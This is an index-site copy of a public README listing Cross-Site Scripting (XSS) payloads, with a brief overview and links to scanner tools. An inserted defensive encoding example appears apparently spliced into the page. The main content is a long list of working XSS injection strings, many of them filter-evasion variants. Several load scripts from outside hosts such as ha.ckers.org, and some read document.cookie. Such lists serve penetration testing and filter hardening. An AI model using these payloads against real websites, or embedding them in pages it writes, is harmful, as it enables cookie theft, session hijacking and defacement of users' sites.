Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.


https://github.com/payloadbox/xss-payload-list

🎯 Cross Site Scripting ( XSS ) Vulnerability Payload List

bugbounty cross-site-scripting dom-based payload payloads reflected-xss-vulnerabilities self-xss websecurity website-vulnerability xss xss-attacks xss-detection xss-exploitation xss-injection xss-payload xss-payloads xss-poc xss-scanner xss-scanners xss-vulnerability

Last synced: about 1 month ago

### 🚀 Cross Site Scripting ( XSS ) Vulnerability Payload List 🚀

##### Overview :

Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted web sites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it.

An attacker can use XSS to send a malicious script to an unsuspecting user. The end user’s browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site. These scripts can even rewrite the content of the HTML page. For more details on the different types of XSS flaws, see: [Types of Cross-Site Scripting](https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting).
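The overview's point that XSS arises where input reaches output "without validating or encoding it", shown as an added example (not code from the payloadbox repository): the unencoded render beside an HTML-context encoder and a URL-scheme allowlist, run against a few strings quoted from the list on this page. The function names and the `https://app.example/` base are assumptions made for the illustration.

```javascript
// Vulnerable pattern from the overview: user input placed in output as-is.
function renderGreetingUnsafe(name) {
  return '<p>Hello ' + name + '</p>';
}

// HTML text and quoted-attribute contexts: encode every character that can
// end the current context or start a tag, entity or attribute value.
const HTML_ESCAPES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;',
  '"': '&quot;', "'": '&#39;', '`': '&#96;',
};

function escapeHtml(value) {
  return String(value).replace(/[&<>"'`]/g, (ch) => HTML_ESCAPES[ch]);
}

function renderGreeting(name) {
  return '<p>Hello ' + escapeHtml(name) + '</p>';
}

// URL contexts (href, src): encoding does not neutralise a javascript: or
// data: URI, so the scheme is checked against an allowlist first. The WHATWG
// URL parser normalises the input the way a browser does (case folding,
// stripping leading spaces, dropping tabs and newlines) before the check.
const ALLOWED_SCHEMES = new Set(['http:', 'https:']);
const SITE_BASE = 'https://app.example/'; // assumed origin for relative links

function safeUrl(raw) {
  let parsed;
  try {
    parsed = new URL(String(raw), SITE_BASE);
  } catch (err) {
    return '#'; // unparseable input never reaches the attribute
  }
  return ALLOWED_SCHEMES.has(parsed.protocol) ? parsed.href : '#';
}

// Validate the raw value first, then encode the result for the attribute.
function renderLink(url, text) {
  return '<a href="' + escapeHtml(safeUrl(url)) + '">' + escapeHtml(text) + '</a>';
}

// Inputs taken from the payload list on this page; the last two are
// constructed benign values for comparison.
const SAMPLE_URLS = [
  'JaVaScRiPt:alert(1)',        // mixed-case scheme
  'jav\tascript:alert(1)',      // tab inside the scheme (the list's &Tab; variants)
  ' javascript:alert(1)',       // leading whitespace
  'data:text/html,<svg onload=alert(1)>',
  '/profile?id=7',              // constructed: relative link
  'https://example.org/a',      // constructed: absolute link
];

function auditSampleUrls() {
  return SAMPLE_URLS.map((u) => [u, safeUrl(u)]);
}

for (const [input, output] of auditSampleUrls()) {
  console.log(JSON.stringify(input), '->', output);
}
console.log(renderGreeting('<input onfocus=javascript:alert(1) autofocus>'));
```

`escapeHtml` covers HTML text and quoted attribute values only; values placed inside `<script>`, `<style>` or unquoted attributes need their own context-specific encoding.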

#### XSS Vulnerability Scanner Tools :

* [XSStrike](https://github.com/UltimateHackers/XSStrike)

* [BruteXSS Terminal](https://github.com/shawarkhanethicalhacker/BruteXSS)

* [BruteXSS GUI](https://github.com/rajeshmajumdar/BruteXSS)

* [XSS Scanner Online](http://xss-scanner.com/)

* [XSSer](https://tools.kali.org/web-applications/xsser)

* [xsscrapy](https://github.com/DanMcInerney/xsscrapy)
* [Cyclops](https://github.com/v8blink/Chromium-based-XSS-Taint-Tracking)

#### XSS Payload List :

```

"-prompt(8)-"
'-prompt(8)-'
";a=prompt,a()//
';a=prompt,a()//
'-eval("window['pro'%2B'mpt'](8)")-'
"-eval("window['pro'%2B'mpt'](8)")-"
"onclick=prompt(8)>"@x.y
"onclick=prompt(8)>"@x.y


javascript:alert(1);
'`"><\x3Cscript>javascript:alert(1)
'`"><\x00script>javascript:alert(1)

\x3Cscript>javascript:alert(1)
'"`>/* *\x2Fjavascript:alert(1)// */
javascript:alert(1)javascript:alert(1)javascript:alert(1)javascript:alert(1)


a='hello\x27;javascript:alert(1)//';


/* *\x2A/javascript:alert(1)// */
/* *\x00/javascript:alert(1)// */

"'`>ABC

DEF
"'`>ABC
DEF
%253Cscript%253Ealert('XSS')%253C%252Fscript%253E
if("x\\xE1\x96\x89".length==2) { javascript:alert(1);}
if("x\\xE0\xB9\x92".length==2) { javascript:alert(1);}
if("x\\xEE\xA9\x93".length==2) { javascript:alert(1);}
'`"><\x3Cscript>javascript:alert(1)
'`"><\x00script>javascript:alert(1)
"'`><\x3Cimg src=xxx:x onerror=javascript:alert(1)>
"'`><\x00img src=xxx:x onerror=javascript:alert(1)>

"`'>\x3Bjavascript:alert(1)
"`'>\x0Djavascript:alert(1)
"`'>\xEF\xBB\xBFjavascript:alert(1)
"`'>\xE2\x80\x81javascript:alert(1)
"`'>\xE2\x80\x84javascript:alert(1)
"`'>\xE3\x80\x80javascript:alert(1)
"`'>\x09javascript:alert(1)
"`'>\xE2\x80\x89javascript:alert(1)
"`'>\xE2\x80\x85javascript:alert(1)
"`'>\xE2\x80\x88javascript:alert(1)
"`'>\x00javascript:alert(1)
"`'>\xE2\x80\xA8javascript:alert(1)
"`'>\xE2\x80\x8Ajavascript:alert(1)
"`'>\xE1\x9A\x80javascript:alert(1)
"`'>\x0Cjavascript:alert(1)
"`'>\x2Bjavascript:alert(1)
"`'>\xF0\x90\x96\x9Ajavascript:alert(1)
"`'>-javascript:alert(1)
"`'>\x0Ajavascript:alert(1)
"`'>\xE2\x80\xAFjavascript:alert(1)
"`'>\x7Ejavascript:alert(1)
"`'>\xE2\x80\x87javascript:alert(1)
"`'>\xE2\x81\x9Fjavascript:alert(1)
"`'>\xE2\x80\xA9javascript:alert(1)
"`'>\xC2\x85javascript:alert(1)
"`'>\xEF\xBF\xAEjavascript:alert(1)
"`'>\xE2\x80\x83javascript:alert(1)
"`'>\xE2\x80\x8Bjavascript:alert(1)
"`'>\xEF\xBF\xBEjavascript:alert(1)
"`'>\xE2\x80\x80javascript:alert(1)
"`'>\x21javascript:alert(1)
"`'>\xE2\x80\x82javascript:alert(1)
"`'>\xE2\x80\x86javascript:alert(1)
"`'>\xE1\xA0\x8Ejavascript:alert(1)
"`'>\x0Bjavascript:alert(1)
"`'>\x20javascript:alert(1)
"`'>\xC2\xA0javascript:alert(1)
"/>
"/>
"/>
"/>
"/>
"/>
"/>
"/>
"/>
javascript:alert(1)<\x00/script>
<img src=# onerror\x3D"javascript:alert(1)" >
<input onfocus=javascript:alert(1) autofocus>
<input onblur=javascript:alert(1) autofocus><input autofocus>
<video poster=javascript:javascript:alert(1)//
<body onscroll=javascript:alert(1)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
<form id=test onforminput=javascript:alert(1)><input></form><button form=test onformchange=javascript:alert(1)>X
<video><source onerror="javascript:javascript:alert(1)">
<video onerror="javascript:javascript:alert(1)"><source>
<form><button formaction="javascript:javascript:alert(1)">X
<body oninput=javascript:alert(1)><input autofocus>
<math href="javascript:javascript:alert(1)">CLICKME</math> <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math>
<frameset onload=javascript:alert(1)>
<table background="javascript:javascript:alert(1)">
<!--<img src="--><img src=x onerror=javascript:alert(1)//">
<comment><img src="</comment><img src=x onerror=javascript:alert(1))//">
<![><img src="]><img src=x onerror=javascript:alert(1)//">
<style><img src="</style><img src=x onerror=javascript:alert(1)//">
<li style=list-style:url() onerror=javascript:alert(1)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1)></div>
<head><base href="javascript://"></head><body><a href="/. /,javascript:alert(1)//#">XXX</a></body>
<SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(1)

alert(1)0


document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;

<div style=width:1px;filter:glow onfilterchange=javascript:alert(1)>x
<? foo="><script>javascript:alert(1)">
javascript:alert(1)">
foo=">javascript:alert(1)">
foo=">">

<% foo>

d.innerHTML=d.innerHTML
XXX

javascript:alert(1)//"

`><img src=x:x onerror=javascript:alert(1)></a>


X
p[foo=bar{}*{-o-link:'javascript:javascript:alert(1)'}{}*{-o-link-source:current}]{color:red};
@import "data:,*%7bx:expression(javascript:alert(1))%7D";
XXXXXX
*[{}@import'%(css)s?]X

XXX
XXX
/ style=x:expression\28javascript:alert(1)\29>
*{x:expression(javascript:alert(1))}

X
X
with(document.getElementById("d"))innerHTML=innerHTML
X
X
XXX
#x{font-family:foo[bar;color:green;} #y];color:red;{}
XXX
({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval
({0:#0=eval/#0#/#0#(javascript:alert(1))})
ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1)}),x
Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1)')()
&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi
&alert&A7&(1)&R&UA;&&<&A9&11/script&X&>
<meta charset="mac-farsi">¼script¾javascript:alert(1)¼/script¾
X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1)` >
1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`&lt;img/src=&quot;x&quot;onerror=javascript:alert(1)&gt;`>
1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=&lt;img/src=&quot;.&quot;onerror=javascript:alert(1)&gt;>
<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=%(vml)s#xss></vmlframe>
1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a>
<a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(1)">XXX</a>
<x style="behavior:url(%(sct)s)">
<xml id="xss" src="%(htc)s"></xml> <label dataformatas="html" datasrc="#xss" datafld="payload"></label>
<event-source src="%(event)s" onload="javascript:alert(1)">
<a href="javascript:javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A">
<div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="&lt;img&#11;src=x:x&#11;onerror&#11;=javascript:alert(1)&gt;">
<script>%(payload)s

javascript:alert(1)


<FRAMESET><FRAME SRC="javascript:javascript:alert(1);"></FRAMESET>
<BODY ONLOAD=javascript:alert(1)>
<BODY ONLOAD=javascript:javascript:alert(1)>
<IMG SRC="jav ascript:javascript:alert(1);">
<BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(1)>
<SCRIPT/SRC="%(jscript)s">
<%(payload)s//<



@import'%(css)s';

li {list-style-image: url("javascript:javascript:alert(1)");}

  • XSS



    javascript:alert(1);
    .XSS{background-image:url("javascript:javascript:alert(1)");}
    BODY{background:url("javascript:javascript:alert(1)")}

    XSS""","XML namespace."),("""<IMG SRC="javascript:javascript:alert(1)">

    +ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4-
    X
    @import'%(css)s';
    a{background:url('s1' 's2)}@import javascript:javascript:alert(1);');}
    &&javascript:alert(1)&&;&&<&&/script&&>
    <SCRIPT onreadystatechange=javascript:javascript:alert(1);>

    javascript:alert(1);

    ]]

    test1
    test1

    ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";
    alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--
    >">'>alert(String.fromCharCode(88,83,83))
    '';!--"=&{()}






    xxs link
    xxs link
    alert("XSS")">











    perl -e 'print "";' > out

    <alert("XSS");//<

    <SCRIPT SRC=//ha.ckers.org/.j>
    <IMG SRC="javascript:alert('XSS')"
    <iframe src=http://ha.ckers.org/scriptlet.html <
    \";alert('XSS');//
    </TITLE><SCRIPT>alert("XSS");



    li {list-style-image: url("javascript:alert('XSS')");}

    • XSS


      @import'http://ha.ckers.org/xss.css';

      BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}
      @im\port'\ja\vasc\ript:alert("XSS")';

      exp/*
      alert('XSS');
      .XSS{background-image:url("javascript:alert('XSS')");}

      BODY{background:url("javascript:alert('XSS')")}
      BODY{background:url("javascript:alert('XSS')")}

      ¼script¾alert(¢XSS¢)¼/script¾




      echo('alert("XSS")'); ?>
      Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser

      +ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-

      " SRC="http://ha.ckers.org/xss.js">

      '" SRC="http://ha.ckers.org/xss.js">
      ` SRC="http://ha.ckers.org/xss.js">

      document.write("<SCRI");PT SRC="http://ha.ckers.org/xss.js">

      {font-family&colon;'<iframe/onload=confirm(1)>'
      <input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;"
      <sVg><scRipt %00>alert&lpar;1&rpar; {Opera}
      <img/src=`%00` onerror=this.onerror=confirm(1)
      <form><isindex formaction="javascript&colon;confirm(1)"
      <img src=`%00`&NewLine; onerror=alert(1)&NewLine;
      <script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script>
      <ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?
      <iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
      <script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/
      &#34;&#62;<h1/onmouseover='\u0061lert(1)'>%00
      <iframe/src="data:text/html,<svg &#111;&#110;load=alert(1)>">
      <meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/>
      <svg><script xlink:href=data&colon;,window.open('https://www.google.com/')></script
      <svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}
      <meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
      <iframe src=javascript&colon;alert&lpar;document&period;location&rpar;>
      <form><a href="javascript:\u0061lert&#x28;1&#x29;">X
      </script><img/*%00/src="worksinchrome&colon;prompt&#x28;1&#x29;"/%00*/onerror='eval(src)'>
      <img/&#09;&#10;&#11; src=`~` onerror=prompt(1)>
      <form><iframe &#09;&#10;&#11; src="javascript&#58;alert(1)"&#11;&#10;&#09;;>
      <a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="&#09;&#10;&#11;>X</a
      http://www.google<script .com>alert(document.location)</script
      <a&#32;href&#61;&#91;&#00;&#93;"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;">XYZ</a
      <img/src=@&#32;&#13; onerror = prompt('&#49;')
      <style/onload=prompt&#40;'&#88;&#83;&#83;'&#41;
      <script ^__^>alert(String.fromCharCode(49))</script ^__^
      /**/alert(document.location)/**/

      /***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/
      X
      alert(0%0)

      <///style///><span %2F onmousemove='alert&lpar;1&rpar;'>SPAN
      <img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1)
      &#34;&#62;<svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>'
      &#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox & Opera}
      <marquee onstart='javascript:alert&#x28;1&#x29;'>^__^
      <div/style="width:expression(confirm(1))">X</div> {IE7}
      <iframe/%00/ src=javaSCRIPT&colon;alert(1)
      //<form/action=javascript&#x3A;alert&lpar;document&period;cookie&rpar;><input/type='submit'>//
      /*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>
      //|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\
      </font>/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(1)>'</font>/

      |\>''alert&#x28;1&#x29; {Opera}
      <a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button>
      <div onmouseover='alert&lpar;1&rpar;'>DIV</div>
      <iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">
      <a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a>
      <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
      <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
      <var onmouseover="prompt(1)">On Mouse Over</var>
      <a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a>
      <img src="/" =_=" title="onerror='prompt(1)'">
      <%<!--'%><script>alert(1);

      X


      http://www.alert(1)
      alert(1)
      <iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>
      <img src=`xx:xx`onerror=alert(1)>
      <object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>
      <meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>
      <math><a xlink:href="//jsfiddle.net/t846h/">click
      <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
      <svg contentScriptType=text/vbs><script>MsgBox+1
      <a href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a
      <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
      <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')
      +-+-1-+-+alert(1)

      /*<script* */alert(1)//&NewLine;confirm(1);
      alert(1)
      <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe
      <script x> alert(1) style="x:">
      <--` --!>

      x
      ">
      CLICKME
      click

      Click Me
      ‘; alert(1);
      ‘)alert(1);//
      alert(1)




      String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)
      ‘;alert(String.fromCharCode(88,83,83))//’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//–>”>’>alert(String.fromCharCode(88,83,83))
      alert(“XSS”)”>



      <alert(“XSS”);//<
      %253cscript%253ealert(1)%253c/script%253e
      “>alert(document.cookie)
      fooalert(1)
      ipt>alert(1)ipt>




      <"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>alert(String.fromCharCode(88,83,83))

      '" SRC="http://ha.ckers.org/xss.js">

      document.write("<SCRI");PT SRC="http://ha.ckers.org/xss.js">
      <alert("XSS");//<
      <"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>alert(String.fromCharCode(88,83,83))
      ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>alert(String.fromCharCode(88,83,83))<?/SCRIPT>&submit.x=27&submit.y=9&cmd=search
      <script>alert("hellox worldss")&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510
      alert("XSS");&search=1
      0&q=';alert(String.fromCharCode(88,83,83))//\';alert%2?8String.fromCharCode(88,83,83))//";alert(String.fromCharCode?(88,83,83))//\";alert(String.fromCharCode(88,83,83)%?29//-->">'>alert(String.fromCharCode(88,83%?2C83))&submit-frmGoogleWeb=Web+Search

      hellox worldss







      ...




      lol


      <img src="
      foo=">alert(1)">
      alert(1)">
      foo=">alert(1)">
      foo=">">

      <% foo>

      LOL
      LOL*{/*all*/color/*all*/:/*all*/red/*all*/;/[0]*IE,Safari*[0]/color:green;color:bl/*IE*/ue;}
      ({0:#0=alert/#0#/#0#(0)})
      LOLalert(123)
      <SCRIPT>alert(/XSS/.source)</SCRIPT>
      \\";alert('XSS');//
      </TITLE><SCRIPT>alert(\"XSS\");</SCRIPT>
      <INPUT TYPE=\"IMAGE\" SRC=\"javascript:alert('XSS');\">
      <BODY BACKGROUND=\"javascript:alert('XSS')\">
      <BODY ONLOAD=alert('XSS')>
      <IMG DYNSRC=\"javascript:alert('XSS')\">
      <IMG LOWSRC=\"javascript:alert('XSS')\">
      <BGSOUND SRC=\"javascript:alert('XSS');\">
      <BR SIZE=\"&{alert('XSS')}\">
      <LAYER SRC=\"http://ha.ckers.org/scriptlet.html\"></LAYER>
      <LINK REL=\"stylesheet\" HREF=\"javascript:alert('XSS');\">
      <LINK REL=\"stylesheet\" HREF=\"http://ha.ckers.org/xss.css\">
      <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
      <META HTTP-EQUIV=\"Link\" Content=\"<http://ha.ckers.org/xss.css>; REL=stylesheet\">
      <STYLE>BODY{-moz-binding:url(\"http://ha.ckers.org/xssmoz.xml#xss\")}</STYLE>
      <XSS STYLE=\"behavior: url(xss.htc);\">
      <STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS
      <IMG SRC='vbscript:msgbox(\"XSS\")'>
      <IMG SRC=\"mocha:[code]\">
      <IMG SRC=\"livescript:[code]\">
      žscriptualert(EXSSE)ž/scriptu
      <META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">
      <META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\">
      <META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\"
      <IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME>
      <FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>
      <TABLE BACKGROUND=\"javascript:alert('XSS')\">
      <TABLE><TD BACKGROUND=\"javascript:alert('XSS')\">
      <DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">
      <DIV STYLE=\"background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029\">
      <DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">
      <DIV STYLE=\"width: expression(alert('XSS'));\">
      <STYLE>@im\port'\ja\vasc\ript:alert(\"XSS\")';</STYLE>
      <IMG STYLE=\"xss:expr/*XSS*/ession(alert('XSS'))\">
      <XSS STYLE=\"xss:expression(alert('XSS'))\">
      exp/*<A STYLE='no\xss:noxss(\"*//*\");
      xss:ex/*XSS*//*/*/pression(alert(\"XSS\"))'>
      <STYLE TYPE=\"text/javascript\">alert('XSS');</STYLE>
      <STYLE>.XSS{background-image:url(\"javascript:alert('XSS')\");}</STYLE><A CLASS=XSS></A>
      <STYLE type=\"text/css\">BODY{background:url(\"javascript:alert('XSS')\")}</STYLE>
      <!--[if gte IE 4]>
      <SCRIPT>alert('XSS');</SCRIPT>
      <![endif]-->
      <BASE HREF=\"javascript:alert('XSS');//\">
      <OBJECT TYPE=\"text/x-scriptlet\" DATA=\"http://ha.ckers.org/scriptlet.html\"></OBJECT>
      <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
      <EMBED SRC=\"http://ha.ckers.org/xss.swf\" AllowScriptAccess=\"always\"></EMBED>
      <EMBED SRC=\"data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\" type=\"image/svg+xml\" AllowScriptAccess=\"always\"></EMBED>
      a=\"get\";
      b=\"URL(\\"\";
      c=\"javascript:\";
      d=\"alert('XSS');\\")\";
      eval(a+b+c+d);
      <HTML xmlns:xss><?import namespace=\"xss\" implementation=\"http://ha.ckers.org/xss.htc\"><xss:xss>XSS</xss:xss></HTML>
      <XML ID=I><X><C><![CDATA[<IMG SRC=\"javas]]><![CDATA[cript:alert('XSS');\">]]>
      </C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
      <XML ID=\"xss\"><I><B><IMG SRC=\"javas<!-- -->cript:alert('XSS')\"></B></I></XML>
      <SPAN DATASRC=\"#xss\" DATAFLD=\"B\" DATAFORMATAS=\"HTML\"></SPAN>
      <XML SRC=\"xsstest.xml\" ID=I></XML>
      <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
      <HTML><BODY>
      <?xml:namespace prefix=\"t\" ns=\"urn:schemas-microsoft-com:time\">
      <?import namespace=\"t\" implementation=\"#default#time2\">
      <t:set attributeName=\"innerHTML\" to=\"XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>\">
      </BODY></HTML>
      <SCRIPT SRC=\"http://ha.ckers.org/xss.jpg\"></SCRIPT>
      <!--#exec cmd=\"/bin/echo '<SCR'\"--><!--#exec cmd=\"/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'\"-->
      <? echo('<SCR)';
      echo('IPT>alert(\"XSS\")</SCRIPT>'); ?>
      <IMG SRC=\"http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode\">
      Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
      <META HTTP-EQUIV=\"Set-Cookie\" Content=\"USERID=<SCRIPT>alert('XSS')</SCRIPT>\">
      <HEAD><META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html; charset=UTF-7\"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
      <SCRIPT a=\">\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
      <SCRIPT =\">\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
      <SCRIPT a=\">\" '' SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
      <SCRIPT \"a='>'\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
      <SCRIPT a=`>` SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
      <SCRIPT a=\">'>\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
      <SCRIPT>document.write(\"<SCRI\");</SCRIPT>PT SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
      <A HREF=\"http://66.102.7.147/\">XSS</A>
      <A HREF=\"http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D\">XSS</A>
      <A HREF=\"http://1113982867/\">XSS</A>
      <A HREF=\"http://0x42.0x0000066.0x7.0x93/\">XSS</A>
      <A HREF=\"http://0102.0146.0007.00000223/\">XSS</A>
      <A HREF=\"htt p://6 6.000146.0x7.147/\">XSS</A>
      <A HREF=\"//www.google.com/\">XSS</A>
      <A HREF=\"//google\">XSS</A>
      <A HREF=\"http://ha.ckers.org@google\">XSS</A>
      <A HREF=\"http://google:ha.ckers.org\">XSS</A>
      <A HREF=\"http://google.com/\">XSS</A>
      <A HREF=\"http://www.google.com./\">XSS</A>
      <A HREF=\"javascript:document.location='http://www.google.com/'\">XSS</A>
      <A HREF=\"http://www.gohttp://www.google.com/ogle.com/\">XSS</A>
      <
      %3C
      &lt
      <
      &LT
      &LT;
      \x3c
      \x3C
      \u003c
      \u003C
      <iframe src=http://ha.ckers.org/scriptlet.html>
      <IMG SRC=\"javascript:alert('XSS')\"
      <SCRIPT SRC=//ha.ckers.org/.js>
      <SCRIPT SRC=http://ha.ckers.org/xss.js?<B>
      <<SCRIPT>alert(\"XSS\");//<</SCRIPT>
      <SCRIPT/SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
      <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(\"XSS\")>
      <SCRIPT/XSS SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
      <IMG SRC=\" javascript:alert('XSS');\">
      perl -e 'print \"<SCR\0IPT>alert(\\"XSS\\")</SCR\0IPT>\";' > out
      perl -e 'print \"<IMG SRC=java\0script:alert(\\"XSS\\")>\";' > out
